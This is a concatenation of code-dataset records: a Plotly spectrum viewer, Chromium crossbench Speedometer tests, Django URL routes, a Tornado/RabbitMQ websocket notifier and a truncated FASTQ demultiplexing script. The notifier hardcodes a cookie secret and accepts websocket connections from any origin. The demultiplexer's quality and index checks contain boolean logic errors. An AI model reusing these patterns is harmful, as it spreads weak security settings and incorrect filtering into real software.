subplot_titles=(\"Magnitude\", \"Phase\"))\n else:\n fig = go.Figure()\n\n else:\n fig = figure\n\n for key, dat in datasets.items():\n if dat.data_type == first_dataset.data_type:\n energy_dim = dat.get_spectrum_dims()\n energy_dim = dat.get_dimension_by_number(energy_dim[0])[0]\n if is_complex_dtype(dat.dtype):\n fig.add_trace(go.Scatter(x=energy_dim.values, y=np.abs(dat).squeeze()*plot_dic['y_scale'], name=f'{dat.title}-Magnitude', mode=\"lines+markers\", marker=dict(size=2)), row=1, col=1)\n fig.add_trace(go.Scatter(x=energy_dim.values, y=np.angle(dat).squeeze()*plot_dic['y_scale'], name=f'{dat.title}-Phase', mode=\"lines+markers\", marker=dict(size=2)), row=1, col=2)\n else:\n fig.add_trace(go.Scatter(x=energy_dim.values, y=np.array(dat).squeeze()*plot_dic['y_scale'], name=dat.title, mode=\"lines+markers\", marker=dict(size=2)))\n \n\n fig.update_layout(\n selectdirection='h',\n showlegend = plot_dic['show_legend'],\n dragmode='select',\n title_text=plot_dic['title'],\n yaxis_title_text=plot_dic['y_axis_label'],\n xaxis_title_text=plot_dic['x_axis_label'],\n height=plot_dic['height'],\n template=plot_dic['theme']\n )\n fig.update_layout(hovermode='x unified')\n \n if plot_dic['has_complex_dataset']:\n fig.update_yaxes(title_text='angle (rad)', row = 1, col = 2)\n fig.update_xaxes(title_text=plot_dic['x_axis_label'], row = 1, col = 2)\n\n config = {'displayModeBar': True}\n if show:\n fig.show(config=config)\n return fig\n\n\nclass SpectrumView(object):\n def __init__(self, datasets, figure=None, **kwargs):\n first_dataset = datasets[list(datasets)[0]]\n if first_dataset.data_type.name != 'SPECTRUM':\n raise TypeError('We need a spectrum dataset here')\n if first_dataset.ndim >1:\n if first_dataset.shape[1] >1:\n raise TypeError('Wrong dimensions for spectrum datasset')\n \n energy_dim = first_dataset.get_spectrum_dims()\n energy_dim = first_dataset.get_dimension_by_number(energy_dim[0])[0]\n\n if 'plot_parameter' not in first_dataset.metadata:\n first_dataset.metadata['plot_parameter'] = {}\n plot_dic = first_dataset.metadata['plot_parameter']\n energy_dim.label = f'{energy_dim.quantity} ({energy_dim.units})'\n\n plot_dic['title'] = kwargs.pop('title', '')\n plot_dic['theme'] = kwargs.pop('theme', \"plotly_white\")\n plot_dic['y_scale'] = kwargs.pop('y_scale', 1.0)\n plot_dic['y_axis_label'] = kwargs.pop('y_axis_label', first_dataset.data_descriptor)\n plot_dic['x_axis_label'] = kwargs.pop('x_axis_label', energy_dim.label)\n plot_dic['height'] = kwargs.pop('height', 500)\n \n\n if 'incident_beam_current_counts' in first_dataset.metadata['experiment']:\n plot_dic['y_scale'] = 1e6/first_dataset.metadata['experiment']['incident_beam_current_counts']\n plot_dic['y_axis_label'] = ' probability (ppm)'\n # plot_dic['y_scale'] = 1e6/first_dataset.sum()\n\n def selection_fn(trace,points,selector):\n self.energy_selection = [points.point_inds[0], points.point_inds[-1]]\n\n self.fig = spectrum_view_plotly(datasets)\n\n self.spectrum_widget = go.FigureWidget(self.fig)\n\n self.spectrum_widget.data[0].on_selection(selection_fn)\n self.spectrum_widget.data[0].on_click(self.identify_edges)\n\n self.edge_annotation = 0\n self.edge_line = 0\n self.regions = {}\n self.initialize_edge()\n\n self.plot = display(self.spectrum_widget)\n\n def initialize_edge(self):\n \"\"\" Intitalizes edge cursor\n Should be run first so that edge cursor is first\n \"\"\"\n self.edge_annotation = len(self.spectrum_widget.layout.annotations)\n self.edge_line = len(self.spectrum_widget.layout.shapes)\n self.spectrum_widget.add_vline(x=200, line_dash=\"dot\", line_color='blue',\n annotation_text= \" \", \n annotation_position=\"top right\",\n visible = False)\n\n def identify_edges(self, trace, points, selector):\n energy = points.xs[0]\n edge_names = find_edge_names(points.xs[0])\n self.spectrum_widget.layout['annotations'][self.edge_annotation].x=energy\n \n self.spectrum_widget.layout['annotations'][self.edge_annotation].text = f\"{edge_names}\"\n self.spectrum_widget.layout['annotations'][self.edge_annotation].visible = True\n self.spectrum_widget.layout['shapes'][self.edge_line].x0 = energy\n self.spectrum_widget.layout['shapes'][self.edge_line].x1 = energy\n self.spectrum_widget.layout['shapes'][self.edge_line].visible = True\n self.spectrum_widget.layout.update()\n\n def add_region(self, text, start, end, color='blue'): \n if text not in self.regions:\n self.regions[text] = {'annotation': len(self.spectrum_widget.layout.annotations),\n 'shape': len(self.spectrum_widget.layout.shapes),\n 'start': start,\n 'end': end,\n 'color': color}\n self.spectrum_widget.add_vrect(x0=start, x1=end, \n annotation_text=text, annotation_position=\"top left\",\n fillcolor=color, opacity=0.15, line_width=0)\n self.spectrum_widget.layout.update()\n else:\n self.update_region(text, start, end)\n\n\n def update_region(self, text, start, end): \n if text in self.regions:\n region = self.regions[text]\n self.spectrum_widget.layout.annotations[region['annotation']].x =start\n self.spectrum_widget.layout['shapes'][region['shape']].x0 = start\n self.spectrum_widget.layout['shapes'][region['shape']].x1 = end\n self.spectrum_widget.layout.update()\n\n def regions_visibility(self, visibility=True):\n\n for region in self.regions.values():\n self.spectrum_widget.layout.annotations[region['annotation']].visible = visibility\n self.spectrum_widget.layout.shapes[region['shape']].visible = visibility\n\n\ndef find_edge_names(energy_value):\n\n selected_edges = []\n for shift in [1,2,5,10,20]:\n selected_edge = ''\n edges = eels.find_major_edges(energy_value, shift)\n edges = edges.split('\\n')\n for edge in edges[1:]:\n edge = edge[:-3].split(':')\n name = edge[0].strip()\n energy = float(edge[1].strip())\n selected_edge = name\n\n if selected_edge != '':\n selected_edges.append(selected_edge)\n if len(selected_edges)>0:\n return selected_edges\n","sub_path":"pyTEMlib/viz.py","file_name":"viz.py","file_ext":"py","file_size_in_byte":18439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"222821974","text":"# Copyright 2022 The Chromium Authors\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nimport abc\nimport argparse\nimport csv\nfrom dataclasses import dataclass\nfrom typing import Optional, Sequence, Type\nfrom unittest import mock\n\nfrom crossbench.benchmarks.speedometer.speedometer import (SpeedometerBenchmark,\n SpeedometerProbe,\n SpeedometerStory)\nfrom crossbench.env import (HostEnvironment, HostEnvironmentConfig,\n ValidationMode)\nfrom crossbench.runner import Runner\nfrom tests.crossbench.benchmarks import helper\n\n\nclass SpeedometerBaseTestCase(\n helper.PressBaseBenchmarkTestCase, metaclass=abc.ABCMeta):\n\n @property\n @abc.abstractmethod\n def benchmark_cls(self) -> Type[SpeedometerBenchmark]:\n pass\n\n @property\n @abc.abstractmethod\n def story_cls(self) -> Type[SpeedometerStory]:\n pass\n\n @property\n @abc.abstractmethod\n def probe_cls(self) -> Type[SpeedometerProbe]:\n pass\n\n @property\n @abc.abstractmethod\n def name(self) -> str:\n pass\n\n def test_iterations(self):\n with self.assertRaises(AssertionError):\n self.benchmark_cls(iterations=-1)\n benchmark = self.benchmark_cls(iterations=123)\n for story in benchmark.stories:\n assert isinstance(story, self.story_cls)\n self.assertEqual(story.iterations, 123)\n\n @dataclass\n class Namespace(argparse.Namespace):\n stories = \"all\"\n iterations = 10\n separate: bool = False\n custom_benchmark_url: Optional[str] = None\n\n def test_default_all(self):\n default_story_names = [\n story.name for story in self.story_cls.default(separate=True)\n ]\n all_story_names = [\n story.name for story in self.story_cls.all(separate=True)\n ]\n self.assertListEqual(default_story_names, all_story_names)\n\n def test_iterations_kwargs(self):\n args = self.Namespace()\n self.benchmark_cls.from_cli_args(args)\n with self.assertRaises(AssertionError):\n args.iterations = \"-10\"\n self.benchmark_cls.from_cli_args(args)\n args.iterations = \"1234\"\n benchmark = self.benchmark_cls.from_cli_args(args)\n for story in benchmark.stories:\n assert isinstance(story, self.story_cls)\n self.assertEqual(story.iterations, 1234)\n\n def test_story_filtering_cli_args_all_separate(self):\n stories = self.story_cls.default(separate=True)\n args = mock.Mock()\n args.stories = \"all\"\n args.separate = True\n stories_all = self.benchmark_cls.stories_from_cli_args(args)\n self.assertListEqual(\n [story.name for story in stories],\n [story.name for story in stories_all],\n )\n\n def test_story_filtering_cli_args_all(self):\n stories = self.story_cls.default(separate=False)\n args = mock.Mock()\n args.stories = \"all\"\n args.custom_benchmark_url = self.story_cls.URL_LOCAL\n args.separate = False\n stories_all = self.benchmark_cls.stories_from_cli_args(args)\n self.assertEqual(len(stories), 1)\n self.assertEqual(len(stories_all), 1)\n story = stories[0]\n assert isinstance(story, self.story_cls)\n self.assertEqual(story.name, self.name)\n story = stories_all[0]\n assert isinstance(story, self.story_cls)\n self.assertEqual(story.name, self.name)\n self.assertEqual(story.url, self.story_cls.URL_LOCAL)\n\n args.custom_benchmark_url = None\n args.separate = False\n stories_all = self.benchmark_cls.stories_from_cli_args(args)\n self.assertEqual(len(stories_all), 1)\n story = stories_all[0]\n assert isinstance(story, self.story_cls)\n self.assertEqual(story.name, self.name)\n self.assertEqual(story.url, self.story_cls.URL)\n\n def test_story_filtering(self):\n with self.assertRaises(ValueError):\n self.story_cls.from_names([])\n stories = self.story_cls.default(separate=False)\n self.assertEqual(len(stories), 1)\n\n with self.assertRaises(ValueError):\n self.story_cls.from_names([], separate=True)\n stories = self.story_cls.default(separate=True)\n self.assertEqual(len(stories), len(self.story_cls.SUBSTORIES))\n\n def test_story_filtering_regexp_invalid(self):\n with self.assertRaises(ValueError):\n _ = self.story_filter( # pytype: disable=wrong-arg-types\n \".*\", separate=True).stories\n\n def test_story_filtering_regexp(self):\n stories = self.story_cls.default(separate=True)\n stories_b = self.story_filter([\".*\"], separate=True).stories\n self.assertListEqual(\n [story.name for story in stories],\n [story.name for story in stories_b],\n )\n\n def test_run_throw(self):\n self._test_run(throw=True)\n\n def test_run_default(self):\n self._test_run()\n for browser in self.browsers:\n urls = self.filter_data_urls(browser.url_list)\n self.assertIn(f\"{self.story_cls.URL}?iterationCount=10\", urls)\n self.assertNotIn(f\"{self.story_cls.URL_LOCAL}?iterationCount=10\", urls)\n\n def test_run_custom_url(self):\n custom_url = \"http://test.example.com/speedometer\"\n self._test_run(custom_url)\n for browser in self.browsers:\n urls = self.filter_data_urls(browser.url_list)\n self.assertIn(f\"{custom_url}?iterationCount=10\", urls)\n self.assertNotIn(f\"{self.story_cls.URL}?iterationCount=10\", urls)\n self.assertNotIn(f\"{self.story_cls.URL_LOCAL}?iterationCount=10\", urls)\n\n def _test_run(self, custom_url: Optional[str] = None, throw: bool = False):\n repetitions = 3\n iterations = 2\n default_story_name = self.story_cls.SUBSTORIES[0]\n self.assertTrue(default_story_name)\n stories = self.story_cls.from_names([default_story_name], url=custom_url)\n example_story_data = {\n \"tests\": {\n \"Adding100Items\": {\n \"tests\": {\n \"Sync\": 74.6000000089407,\n \"Async\": 6.299999997019768\n },\n \"total\": 80.90000000596046\n },\n \"CompletingAllItems\": {\n \"tests\": {\n \"Sync\": 22.600000008940697,\n \"Async\": 5.899999991059303\n },\n \"total\": 28.5\n },\n \"DeletingItems\": {\n \"tests\": {\n \"Sync\": 11.800000011920929,\n \"Async\": 0.19999998807907104\n },\n \"total\": 12\n }\n },\n \"total\": 121.40000000596046\n }\n speedometer_probe_results = [{\n \"tests\": {story.name: example_story_data for story in stories},\n \"total\": 1000,\n \"mean\": 2000,\n \"geomean\": 3000,\n \"score\": 10\n } for i in range(iterations)]\n\n for browser in self.browsers:\n # This depends on the JS actions in SpeedometerStory:\n browser.js_side_effect = [\n True, # Page is ready\n None, # _setup_substories\n None, # _setup_benchmark_client\n None, # _run_stories\n True, # Wait until done\n speedometer_probe_results,\n ]\n benchmark = self.benchmark_cls(stories, custom_url=custom_url)\n self.assertTrue(len(benchmark.describe()) > 0)\n runner = Runner(\n self.out_dir,\n self.browsers,\n benchmark,\n env_config=HostEnvironmentConfig(),\n env_validation_mode=ValidationMode.SKIP,\n platform=self.platform,\n repetitions=repetitions,\n throw=throw)\n with mock.patch.object(\n HostEnvironment, \"validate_url\", return_value=True) as cm:\n runner.run()\n cm.assert_called_once()\n for browser in self.browsers:\n urls = self.filter_data_urls(browser.url_list)\n self.assertEqual(len(urls), repetitions)\n self.assertIn(SpeedometerProbe.JS, browser.js_list)\n\n with (self.out_dir /\n f\"{self.probe_cls.NAME}.csv\").open(encoding=\"utf-8\") as f:\n csv_data = list(csv.DictReader(f, delimiter=\"\\t\"))\n self.assertListEqual(list(csv_data[0].keys()), [\"label\", \"dev\", \"stable\"])\n self.assertDictEqual(csv_data[1], {\n 'label': 'version',\n 'dev': '102.22.33.44',\n 'stable': '100.22.33.44'\n })\n\n def _run_story_names(self, story_names: Sequence[str], separate: bool,\n expected_num_urls: int):\n repetitions = 3\n iterations = 2\n stories = self.story_cls.from_names(story_names, separate=separate)\n example_story_data = {\n \"tests\": {\n \"Adding100Items\": {\n \"tests\": {\n \"Sync\": 74.6000000089407,\n \"Async\": 6.299999997019768\n },\n \"total\": 80.90000000596046\n },\n \"CompletingAllItems\": {\n \"tests\": {\n \"Sync\": 22.600000008940697,\n \"Async\": 5.899999991059303\n },\n \"total\": 28.5\n },\n \"DeletingItems\": {\n \"tests\": {\n \"Sync\": 11.800000011920929,\n \"Async\": 0.19999998807907104\n },\n \"total\": 12\n }\n },\n \"total\": 121.40000000596046\n }\n speedometer_probe_results = [{\n \"tests\": {story.name: example_story_data for story in stories},\n \"total\": 1000,\n \"mean\": 2000,\n \"geomean\": 3000,\n \"score\": 10\n } for i in range(iterations)]\n\n for browser in self.browsers:\n browser.js_side_effect = [\n True, # Page is ready\n None, # _setup_substories\n None, # _setup_benchmark_client\n None, # _run_stories\n True, # Wait until done\n speedometer_probe_results,\n ]\n benchmark = self.benchmark_cls(stories)\n self.assertTrue(len(benchmark.describe()) > 0)\n runner = Runner(\n self.out_dir,\n self.browsers,\n benchmark,\n env_config=HostEnvironmentConfig(),\n env_validation_mode=ValidationMode.SKIP,\n platform=self.platform,\n repetitions=repetitions)\n with mock.patch.object(self.benchmark_cls, \"validate_url\") as cm:\n runner.run()\n cm.assert_called_once()\n\n for browser in self.browsers:\n urls = self.filter_data_urls(browser.url_list)\n self.assertEqual(len(urls), expected_num_urls)\n self.assertIn(self.probe_cls.JS, browser.js_list)\n\n with (self.out_dir /\n f\"{self.probe_cls.NAME}.csv\").open(encoding=\"utf-8\") as f:\n csv_data = list(csv.DictReader(f, delimiter=\"\\t\"))\n self.assertListEqual(list(csv_data[0].keys()), [\"label\", \"dev\", \"stable\"])\n self.assertDictEqual(csv_data[1], {\n 'label': 'version',\n 'dev': '102.22.33.44',\n 'stable': '100.22.33.44'\n })\n with self.assertLogs(level='INFO') as cm:\n for probe in runner.probes:\n for run in runner.runs:\n probe.log_run_result(run)\n output = \"\\n\".join(cm.output)\n self.assertIn(\"Speedometer results\", output)\n\n with self.assertLogs(level='INFO') as cm:\n for probe in runner.probes:\n probe.log_browsers_result(runner.browser_group)\n output = \"\\n\".join(cm.output)\n self.assertIn(\"Speedometer results\", output)\n self.assertIn(\"102.22.33.44\", output)\n self.assertIn(\"100.22.33.44\", output)\n\n def test_run_combined(self):\n self._run_story_names([\"VanillaJS-TodoMVC\", \"Elm-TodoMVC\"],\n separate=False,\n expected_num_urls=3)\n\n def test_run_separate(self):\n self._run_story_names([\"VanillaJS-TodoMVC\", \"Elm-TodoMVC\"],\n separate=True,\n expected_num_urls=6)\n","sub_path":"third_party/crossbench/tests/crossbench/benchmarks/speedometer_helper.py","file_name":"speedometer_helper.py","file_ext":"py","file_size_in_byte":11558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"345531799","text":"from django.contrib import admin\nfrom django.conf.urls import include, url\nfrom libs.views import *\n\nurlpatterns = [\n url(r'^logout/$', Logout, name='logout'),\n url(r'^register-member/$', register, name='register-member'),\n url(r'^user-profile/$', user_profile, name='user-profile'),\n url(r'^update-confirmation/$', update_confirmation, name='update-confirmation'),\n url(r'^register-confirmation/$', register_confirmation,\n name='register-confirmation'),\n url(r'^add-dict/$', add_dict, name='add-dict'),\n url(r'^accts/$', accts, name='accts'),\n url(r'^', dashboard, name='dashboard'),\n\n\n\n]\n","sub_path":"libs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"633233024","text":"import sys\nimport tornado.escape\nimport tornado.ioloop\nimport tornado.options\nimport tornado.web\nimport tornado.websocket\nimport pika\nfrom pika.adapters.tornado_connection import TornadoConnection\nimport pickle\nimport json\nimport uuid\nimport logging\nimport os\n\nfrom tornado.options import define, options\n\ndefine(\"port\", default=8888, help=\"run on the given port\", type=int)\n\nrabbitmq_server = os.environ.get(\"RABBITMQ_SERVER\")\n\nclass Application(tornado.web.Application):\n def __init__(self):\n self.recieve = PikaClient()\n self.recieve.connect()\n\n handlers = [(r\"/notification\", ChatSocketHandler)]\n settings = dict(\n cookie_secret=\"UXZpTuZvFACo1pOgNNvG0sbPm4RFyNToXzI+HAtkp4c=\",\n xsrf_cookies=True,\n )\n super(Application, self).__init__(handlers, **settings)\n\n\nclass ChatSocketHandler(tornado.websocket.WebSocketHandler):\n waiters = {}\n \n def check_origin(self, origin):\n # Enable cross-domain request\n # logging.info(origin)\n return True\n \n def get_compression_options(self):\n # Non-None enables compression with default options.\n return {}\n\n def open(self):\n self.uuid = str(uuid.uuid4())\n ChatSocketHandler.waiters[self.uuid] = self\n session_info = {\n 'type': \"CONNECT\",\n 'id': self.uuid,\n }\n\n waiter = self\n try:\n waiter.write_message(json.dumps(session_info))\n except:\n logging.error(\"Error sending message\", exc_info=True)\n\n def on_close(self):\n ChatSocketHandler.waiters.pop(self.uuid)\n\n @staticmethod\n def on_caculate_success(uuid, index):\n logging.info(\"on_caculate_success\")\n cacalation_notification_info = {\n 'type': \"NOTIFICATION_CACULATION_SUCCESS\",\n 'index': index\n }\n if uuid in ChatSocketHandler.waiters:\n waiter = ChatSocketHandler.waiters[uuid]\n waiter.write_message(json.dumps(cacalation_notification_info))\n\n\nclass PikaClient(object):\n def __init__(self):\n self.ioloop = tornado.ioloop.IOLoop.instance()\n self.connection = None\n self.channel = None\n\n\n self._delivery_tag = 0\n self.parameters = pika.ConnectionParameters(rabbitmq_server)\n\n def connect(self):\n self.connection = TornadoConnection(self.parameters, on_open_callback=self.on_connected, stop_ioloop_on_close=False, on_open_error_callback=self.on_open_error)\n self.connection.add_on_close_callback(self.on_closed)\n\n def on_open_error(self, unused_connection, err):\n sys.exit(1)\n\n def on_connected(self, connection):\n logging.info('PikaClient: connected to RabbitMQ')\n self.connection.channel(self.on_exchange_declare)\n\n def on_exchange_declare(self, channel):\n logging.info('PikaClient: Channel %s open, Declaring exchange' % channel)\n self.channel = channel\n self.channel.exchange_declare(self.on_queue_declare, exchange='notification', exchange_type='direct')\n\n def on_queue_declare(self, method_frame):\n logging.info('PikaClient: Channel open, Declaring queue')\n self.channel.queue_declare(self.on_queue_bind, queue='notification') #, durable=True)\n\n def on_queue_bind(self, method_frame):\n logging.info('Queue bound')\n self.channel.queue_bind(self.on_consume_bind, queue=\"notification\", exchange=\"notification\", routing_key=\"notification\")\n\n def on_consume_bind(self, frame):\n logging.info(\"Consume bind\")\n self.channel.basic_qos(prefetch_count=1)\n self.channel.basic_consume(self.on_response, queue='notification', no_ack=False)\n\n def on_response(self, channel, method, properties, body):\n logging.info('on_response')\n message=pickle.loads(body)\n logging.info(message)\n ChatSocketHandler.on_caculate_success(message['id'], message['index'])\n channel.basic_ack(delivery_tag = method.delivery_tag)\n\n def on_closed(self, connection):\n logging.info('PikaClient: rabbit connection closed')\n self.connection.close()\n self.channel.close()\n self.ioloop.stop()\n\n\ndef main():\n tornado.options.parse_command_line()\n app = Application()\n app.listen(options.port)\n\n tornado.ioloop.IOLoop.current().start()\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"labs/final_project/notification_service/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"414906898","text":"#!/usr/bin/env python\n\n### Imported methods ###\nimport itertools\nimport argparse\nimport gzip\n\n### Argparse ###\ndef get_args():\n \"\"\"\n Adds a command line option to perform this script in the terminal.\n \"\"\"\n parser = argparse.ArgumentParser(description='Demultiplex a raw fastq file.')\n parser.add_argument('-r1','--read1', help='read1.fastq file location', required=True)\n parser.add_argument('-r2','--read2', help='read2.fastq file location', required=True)\n parser.add_argument('-r3','--read3', help='read3.fastq file location', required=True)\n parser.add_argument('-r4','--read4', help='read4.fastq file location', required=True)\n parser.add_argument('-cutoff','--cutoff', help='desired qscore cutoff value', required=True)\n return parser.parse_args()\nargs = get_args()\n\n### Global variables ###\nR1_FASTQ = args.read1\nR2_FASTQ = args.read2\nR3_FASTQ = args.read3\nR4_FASTQ = args.read4\nqscore_cutoff = int(args.cutoff)\nindexes = [\"GTAGCGTA\",\"CGATCGAT\",\"GATCAAGG\",\"AACAGCGA\",\"TAGCCATG\",\"CGGTAATC\",\"CTCTGGAT\",\"TACCGGAT\",\"CTAGCTCA\",\"CACTTCAC\",\"GCTACTCT\",\"ACGATCAG\",\"TATGGCAC\",\"TGTTCCGT\",\"GTCCTAAG\",\"TCGACAAG\",\"TCTTCGAC\",\"ATCATGCG\",\"ATCGTGGT\",\"TCGAGAGT\",\"TCGGATTC\",\"GATCTTGC\",\"AGAGTCCA\",\"AGGATAGC\"]\n\n### Functions ###\ndef convert_phred(letter):\n \"\"\"Converts a single character into a quality score\n single character (A) --> ASCII (65) - 33 = 32\"\"\"\n qscore = ord(letter) - 33\n return qscore\n\ndef check_qscore(qscore):\n \"\"\"\n Calls on convert_phred to onverts a quality score \\\n and check if the score meets the cutoff. Will \\\n return a Boolean value.\n \"\"\"\n for letter in qscore:\n score = convert_phred(letter)\n if score < qscore_cutoff:\n return False\n return True\n\ndef reverse_complement(sequence):\n \"\"\"\n Takes a sequence string and makes a \\\n reverse complement of it.\n Example: \n sequence reverse complement\n GTAGCGTA TACGCTAC\n \"\"\"\n complements = str.maketrans(\"ATGCN\", \"TACGN\")\n revcom_sequence = sequence.translate(complements)[::-1]\n return revcom_sequence\n\ndef create_revcom_indexes():\n \"\"\"\n This function will make a list of reverse complements of the indexes.\n \"\"\"\n revcom_indexes = []\n for i in indexes:\n revcom_index = reverse_complement(i)\n revcom_indexes.append(revcom_index)\n return revcom_indexes\nrevcom_indexes = create_revcom_indexes()\n\ndef populate_matched():\n \"\"\"\n This function will populate all possible index hopping combinations as a \\\n tuple pair (x, y) and put them into a list.\n It will call the reverse complement function for y.\n \"\"\"\n matched_dict = {}\n zipped = zip(indexes, revcom_indexes)\n matched_list = list(zipped)\n for item in matched_list:\n paired = \"-\".join(item)\n matched_dict.setdefault(paired,0)\n # if paired in matched_dict:\n # matched_dict[paired] += 1\n # else:\n # matched_dict.setdefault(paired,0)\n return matched_list, matched_dict\nmatched_list, matched_dict = populate_matched()\n#print(matched_list)\n#print(matched_dict)\n\ndef populate_unmatched():\n \"\"\"\n This function will populate all possible index hopping combinations \\\n as a tuple pair (x, y), where 'x' is index1 and 'y' is the reverse complement \\\n of index2 and put them into a dictionary.\n \"\"\"\n hopped_dict = {}\n all_indexes = [indexes, revcom_indexes]\n all_unmatched = list(itertools.product(*all_indexes))\n filtered = list(filter(lambda i: i not in matched_list, all_unmatched))\n for item in filtered:\n paired = \"-\".join(item)\n hopped_dict.setdefault(paired,0)\n # if paired in hopped_dict:\n # hopped_dict[paired] += 1\n # else:\n # hopped_dict.setdefault(paired,0)\n return hopped_dict\nhopped_dict = populate_unmatched()\n#print(hopped_dict)\n\ndef name_outfiles():\n \"\"\"\n This function will name all the output files as strings and put \\\n them into a list.\n \"\"\"\n R1 = itertools.cycle([\"_R1.fastq\"])\n R4 = itertools.cycle([\"_R4.fastq\"])\n R1_files = list(zip(indexes, R1))\n pairs = [\"Hopped_R1.fastq\",\"Hopped_R4.fastq\",\"LowQ_R1.fastq\",\"LowQ_R4.fastq\"]\n for pair1 in R1_files:\n pair1 = \"\".join(pair1)\n pairs.append(str(pair1))\n R4_files = list(zip(indexes, R4))\n for pair2 in R4_files:\n pair2 = \"\".join(pair2)\n pairs.append(str(pair2))\n return pairs\noutfiles = name_outfiles()\n\ndef name_fhs():\n \"\"\"\n This function will name the file handles (fh) to be used and put them in \\\n to a list.\n \"\"\"\n fh = itertools.cycle([\"fh\"])\n nums = list(range(len(outfiles)))\n y = []\n for num in nums:\n string = str(num)\n y.append(string)\n fhs = list(zip(fh, y))\n pairs = []\n for pair in fhs:\n pair = \"\".join(pair)\n pairs.append(pair)\n return pairs\nfhs = name_fhs()\n\ndef open_files():\n \"\"\"This function will open files to write for the main().\n \"\"\"\n for i, item in enumerate(outfiles):\n fhs[i] = open(item,\"w\")\n print(\"Opened files\")\n return\n\ndef close_files():\n \"\"\"\n This function will close files written from the main().\n \"\"\"\n for pos in outfiles:\n pos = (pos.split(\"_\")[0])\n handle1 = outfiles.index(pos+\"_R1.fastq\")\n handle2 = outfiles.index(pos+\"_R4.fastq\")\n fhs[handle1].close()\n fhs[handle2].close()\n print(\"Closed files\")\n return\n\n### Main script ###\nwith gzip.open(R1_FASTQ, 'tr') as R1, gzip.open(R2_FASTQ,'tr') as R2, gzip.open(R3_FASTQ,'tr') as R3, gzip.open(R4_FASTQ,'tr') as R4:\n open_files()\n\n # counters\n LN = 0\n RN = 0\n lowQ_records = 0\n hopped_records = 0\n matched_records = 0\n\n # lists to hold each record for each file\n R1_record = []\n R2_record = []\n R3_record = []\n R4_record = []\n\n # read all 4 files line by line simultanously\n for R1_line, R2_line, R3_line, R4_line in zip(R1, R2, R3, R4):\n LN += 1\n R1_line = R1_line.strip()\n R2_line = R2_line.strip()\n R3_line = R3_line.strip()\n R4_line = R4_line.strip()\n \n # add lines to each record list\n if LN//4 == RN:\n R1_record.append(R1_line)\n R2_record.append(R2_line)\n R3_record.append(R3_line)\n R4_record.append(R4_line)\n else:\n R1_record.append(R1_line)\n R2_record.append(R2_line)\n R3_record.append(R3_line)\n R4_record.append(R4_line)\n RN += 1\n\n # index1 and index2 calculations\n index1 = R2_record[1]\n index2 = R3_record[1]\n paired = index1+\"-\"+index2\n rc_index2 = reverse_complement(index2)\n qscore1 = R2_record[3]\n qscore2 = R3_record[3]\n check1 = check_qscore(qscore1)\n check2 = check_qscore(qscore2)\n\n # add index1 and index2 onto header1 and header2\n header1 = R1_record[0] + \" \" + paired\n header2 = R4_record[0] + \" \" + paired\n\n # check index read quality\n if check1 and check2 == True:\n\n # good index read quality; check if known index read\n if index1 and rc_index2 in indexes:\n\n # good index read quality; known index reads; check if paired indexes in matched_dict\n if paired in matched_dict:\n matched_records += 1\n matched_dict[paired] += 1\n\n # finding the index position of the index in outfiles\n for pos in outfiles:\n pos = (pos.split(\"_\")[0])\n handle1 = outfiles.index(pos+\"_R1.fastq\")\n handle2 = outfiles.index(pos+\"_R4.fastq\")\n\n # writing to the appropriate file handles for each index\n if index1 == pos:\n fhs[handle1].write(str(header1)+\"\\n\"+str(R1_record[1])+\"\\n\"+str(R1_record[2])+\"\\n\"+str(R1_record[3])+\"\\n\")\n fhs[handle2].write(str(header2)+\"\\n\"+str(R4_record[1])+\"\\n\"+str(R4_record[2])+\"\\n\"+str(R4_record[3])+\"\\n\")\n break\n\n # good index read quality; known index reads; not in matched_dict; check if in hopped_dict\n elif paired in hopped_dict:\n hopped_records += 1\n hopped_dict[paired] += 1\n fhs[0].write(str(header1)+\"\\n\"+str(R1_record[1])+\"\\n\"+str(R1_record[2])+\"\\n\"+str(R1_record[3])+\"\\n\")\n fhs[1].write(str(header2)+\"\\n\"+str(R4_record[1])+\"\\n\"+str(R4_record[2])+\"\\n\"+str(R4_record[3])+\"\\n\")\n \n else:\n lowQ_records += 1\n fhs[2].write(str(header1)+\"\\n\"+str(R1_record[1])+\"\\n\"+str(R1_record[2])+\"\\n\"+str(R1_record[3])+\"\\n\")\n fhs[3].write(str(header2)+\"\\n\"+str(R4_record[1])+\"\\n\"+str(R4_record[2])+\"\\n\"+str(R4_record[3])+\"\\n\")\n\n # good index read quality; unknown index1 or rc_index2\n else:\n lowQ_records += 1\n fhs[2].write(str(header1)+\"\\n\"+str(R1_record[1])+\"\\n\"+str(R1_record[2])+\"\\n\"+str(R1_record[3])+\"\\n\")\n fhs[3].write(str(header2)+\"\\n\"+str(R4_record[1])+\"\\n\"+str(R4_record[2])+\"\\n\"+str(R4_record[3])+\"\\n\")\n \n # bad index read quality\n else:\n lowQ_records += 1\n fhs[2].write(str(header1)+\"\\n\"+str(R1_record[1])+\"\\n\"+str(R1_record[2])+\"\\n\"+str(R1_record[3])+\"\\n\")\n fhs[3].write(str(header2)+\"\\n\"+str(R4_record[1])+\"\\n\"+str(R4_record[2])+\"\\n\"+str(R4_record[3])+\"\\n\")\n\n # clear record lists for next record\n R1_record.clear()\n R2_record.clear()\n R3_record.clear()\n R4_record.clear()\n\n # close output files\n close_files()\n\n### writing outputs to output file ###\nwith open(\"outputs.txt\",\"w\") as out_file:\n # calculating percentages for index pairs\n lowQ_percent = (lowQ_records / RN) * 100\n hopped_percent = (hopped_records / RN) * 100\n matched_percent = (matched_records / RN) * 100\n\n # All record values table\n out_file.write(\"Record Type\"+\"\\t\"+\"# of all\"+\"\\t\"+\"Percent\"+\"\\n\")\n out_file.write(\"All: \"+str(RN)+\"\\n\")\n out_file.write(\"Matched:\"+\"\\t\"+str(matched_records)+\"\\t\"+str(matched_percent)+\"\\n\")\n out_file.write(\"Hopped:\"+\"\\t\"+str(hopped_records)+\"\\t\"+str(hopped_percent)+\"\\n\")\n out_file.write(\"Low 